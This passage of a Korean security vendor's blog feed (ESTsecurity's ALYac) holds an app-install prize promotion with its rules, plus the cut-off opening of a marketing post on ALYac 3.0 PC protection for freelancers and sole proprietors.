&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 참여 기간 &lt;/b&gt;: 2025년 11월 25일(화) ~ 12월 12일(금) 23:59&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 당첨자 발표 &lt;/b&gt;: 2025년 12월 18일(목), 참여 시 입력한 연락처로 개별 안내&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 경품 발송 &lt;/b&gt;: 발표 후 영업일 기준 3~7일 내 순차 발송&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;참여 방법&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;1. 알약 앱 설치&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;2. 앱 실행 후 이벤트 페이지에서 이름&amp;middot;전화번호 입력&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;3. 클릭 한 번으로 즉시 응모 완료! &lt;/span&gt;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;※ 이벤트 기간 중 1회만 참여 가능합니다&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;경품 구성&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 신세계백화점 상품권 100만 원권&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 스타벅스 아메리카노 T&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- 네이버페이 포인트 3,000P&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;- GS25 모바일상품권 2,000원권&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;신세계 상품권 100만 원권 당첨 시 제세공과금 22%는 당첨자 부담입니다. &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;경품은 모두 무작위 추첨을 통해 공정하게 선정됩니다.&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;추가 혜택 안내&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이벤트 참여를 완료하신 고객에게는&amp;nbsp;&lt;b&gt;패밀리케어 연간 구독 30% 할인 혜택&lt;/b&gt;을 함께 제공합니다&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;연간 구독 상품에 한해 적용&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이벤트 기간 내 결제한 건만 할인 가능&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;최초 결제 후 자동 갱신 시 동일 할인율 유지&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;※ 구독 해지 후 재구독 시 할인은 유지되지 않습니다&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;promotion_2.png&quot; data-origin-width=&quot;1440&quot; data-origin-height=&quot;1984&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dcQrjT/dJMcahCUQsO/216iOcI0pDYnMK8DCZtzT1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dcQrjT/dJMcahCUQsO/216iOcI0pDYnMK8DCZtzT1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dcQrjT/dJMcahCUQsO/216iOcI0pDYnMK8DCZtzT1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdcQrjT%2FdJMcahCUQsO%2F216iOcI0pDYnMK8DCZtzT1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1440&quot; height=&quot;1984&quot; data-filename=&quot;promotion_2.png&quot; data-origin-width=&quot;1440&quot; data-origin-height=&quot;1984&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Button (1).png&quot; data-origin-width=&quot;984&quot; data-origin-height=&quot;156&quot;&gt;&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.estsoft.alyac&amp;amp;referrer=utm_source%3Dalyacapp_download%26utm_medium%3Dsktsms&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/6tXHo/dJMcacn40Pc/oMAB6lG8q4VnQQ5IsOkN50/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F6tXHo%2FdJMcacn40Pc%2FoMAB6lG8q4VnQQ5IsOkN50%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;984&quot; height=&quot;156&quot; data-filename=&quot;Button (1).png&quot; data-origin-width=&quot;984&quot; data-origin-height=&quot;156&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&amp;nbsp;이벤트 참여 시 꼭 확인해주세요&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;1인 1회 참여 및 1회 당첨만 가능합니다. 중복 참여 및 중복 당첨은 불가합니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이벤트 참여 시점의 앱 설치 기록이 자동 반영되며, 반복 설치 등 비정상 참여는 제외됩니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;패밀리케어 연간 구독자 또는 기존 초대 멤버는 이벤트 참여가 제한될 수 있습니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;입력한 이름&amp;middot;전화번호 오류로 인한 경품 미수령은 책임지기 어렵습니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;개인정보는 당첨자 선정 및 경품 발송 목적으로만 사용되며, 발송 완료 후 30일 이내 안전하게 파기됩니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;네트워크 장애, 단말기 설정 문제 등 사용자 환경으로 인한 참여 오류는 책임지지 않습니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #666666; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이벤트 내용과 일정은 필요 시 사전 안내 없이 변경될 수 있습니다.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;알약 모바일 앱을 설치해 주셔서 진심으로 감사드리며, 앞으로도 더 안전한 디지털 생활을 위한 보안 서비스를 제공하기 위해 최선을 다하겠습니다. &lt;/b&gt;&lt;b&gt;많은 관심과 참여 부탁드립니다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384075.png&quot; data-origin-width=&quot;1886&quot; data-origin-height=&quot;1045&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cNDx48/dJMcadmVPAa/xUbYOBb8wS7KmjWa6GUNB0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cNDx48/dJMcadmVPAa/xUbYOBb8wS7KmjWa6GUNB0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cNDx48/dJMcadmVPAa/xUbYOBb8wS7KmjWa6GUNB0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcNDx48%2FdJMcadmVPAa%2FxUbYOBb8wS7KmjWa6GUNB0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;300&quot; height=&quot;166&quot; data-filename=&quot;Group 2034384075.png&quot; data-origin-width=&quot;1886&quot; data-origin-height=&quot;1045&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>개인정보보호</category>
      <category>모바일백신</category>
      <category>스미싱</category>
      <category>알약</category>
      <category>앱설치이벤트</category>
      <category>앱추천</category>
      <category>패밀리케어</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5687</guid>
      <comments>https://alyacofficialblog.tistory.com/5687#entry5687comment</comments>
      <pubDate>Mon, 8 Dec 2025 12:34:17 +0900</pubDate>
    </item>
    <item>
      <title>1인 사업자, 프리랜서도 걱정 끝! 알약 3.0으로 PC 보안 스트레스 없이 일하는 법</title>
      <link>https://alyacofficialblog.tistory.com/5686</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;1인&amp;nbsp;사업자와&amp;nbsp;프리랜서에게&amp;nbsp;하루는&amp;nbsp;늘&amp;nbsp;부족합니다.&amp;nbsp;클라이언트&amp;nbsp;미팅,&amp;nbsp;제안서&amp;nbsp;작성,&amp;nbsp;세무&amp;nbsp;처리까지&amp;nbsp;모든&amp;nbsp;업무를&amp;nbsp;혼자&amp;nbsp;해결하다&amp;nbsp;보면&amp;nbsp;PC&amp;nbsp;보안은&amp;nbsp;자연스럽게&amp;nbsp;뒷순위로&amp;nbsp;밀리게&amp;nbsp;되는데요.&amp;nbsp;하지만&amp;nbsp;실제&amp;nbsp;보안&amp;nbsp;위협은&amp;nbsp;규모를&amp;nbsp;가리지&amp;nbsp;않습니다.&amp;nbsp;보안&amp;nbsp;체계가&amp;nbsp;약한&amp;nbsp;소규모&amp;nbsp;사업자가&amp;nbsp;사이버&amp;nbsp;공격의&amp;nbsp;주요&amp;nbsp;타깃이&amp;nbsp;되는&amp;nbsp;추세는&amp;nbsp;더욱&amp;nbsp;뚜렷해지고&amp;nbsp;있습니다.&amp;nbsp;​&amp;nbsp;​&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-6254a73b-a06c-49fb-85e8-b87c5d649fb1&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;773&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/w7yZD/dJMcacImgCF/3G9uJdVHToNjJoWrH5k1hk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/w7yZD/dJMcacImgCF/3G9uJdVHToNjJoWrH5k1hk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/w7yZD/dJMcacImgCF/3G9uJdVHToNjJoWrH5k1hk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fw7yZD%2FdJMcacImgCF%2F3G9uJdVHToNjJoWrH5k1hk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;773&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;773&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;div&gt;
&lt;p style=&quot;color: #ffffff;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;AI 활용&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;AI 활용 시대, 1인 사업자의 보안 리스크는 더 커지고 있습니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;소규모 사업 환경에서는 보안 점검이 늘 &amp;lsquo;나중에&amp;rsquo;로 밀리기 쉽습니다. 하지만 사이버 공격은 기다려주지 않습니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;2024년 한국인터넷진흥원(KISA)에 따르면&amp;nbsp;전체 악성코드 감염 중 85% 이상이 랜섬웨어이며,&amp;nbsp;&lt;u&gt;피해 기업의 94%&lt;/u&gt;가 중소사업자&amp;middot;중견기업으로 나타났습니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;규모가 작을수록 보안 체계가 취약해 공격자들에게 더 매력적인 표적이 되고 있는 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #666666; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #666666; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;고객 데이터베이스, 프로젝트 산출물, 재무 자료 등이 랜섬웨어로 암호화되면 사업은 즉시 멈춥니다. 복구 비용을 지불해도 모든 파일이 복원된다는 보장은 없고, 고객 신뢰를 잃을 가능성도 높습니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;보안의 중요성은 충분히 알고 있지만 전문 인력도, 별도의 IT 예산도 갖추기 어려운 것이 현실입니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;그렇다면 1인 사업자, 소규모 사업 환경에는 어떤 보안 시스템이 필요할까요?&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #666666; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-07cf833e-5502-4bb0-9945-3927cfd83b6e&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;blockquote data-ke-size=&quot;size16&quot; data-ke-style=&quot;style3&quot;&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;비즈니스에만 집중하세요.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 관리는 알약이 책임집니다.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;알약 3.0 - 더 강해진 탐지력, 더 편리해진 사용성&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cg6l5b/dJMcahbOWUa/x1LsOiMISejUrmxPTGs9x1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cg6l5b/dJMcahbOWUa/x1LsOiMISejUrmxPTGs9x1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cg6l5b/dJMcahbOWUa/x1LsOiMISejUrmxPTGs9x1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcg6l5b%2FdJMcahbOWUa%2Fx1LsOiMISejUrmxPTGs9x1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;423&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p id=&quot;SE-a6ddd93d-e82e-4445-910e-a6a5e2adf6d8&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;복잡한 설정이나 보안 지식 없이도 자동으로 PC 보호가 가능하도록 알약 3.0은 완전히 새롭게 설계되었습니다. 설치 후 단 한 번의 설정만으로 실시간 감시, 예약 검사, USB 자동 검사까지 모두 자동으로 운영됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-8a08438a-5cb2-44c4-a205-fde633e6713b&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-012b7427-44bc-4297-8a93-71314484fbc8&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-c667a25a-59af-455a-a1d4-bab4a9ab3ec8&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;듀얼 엔진 기반의 기업 수준 탐지력&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
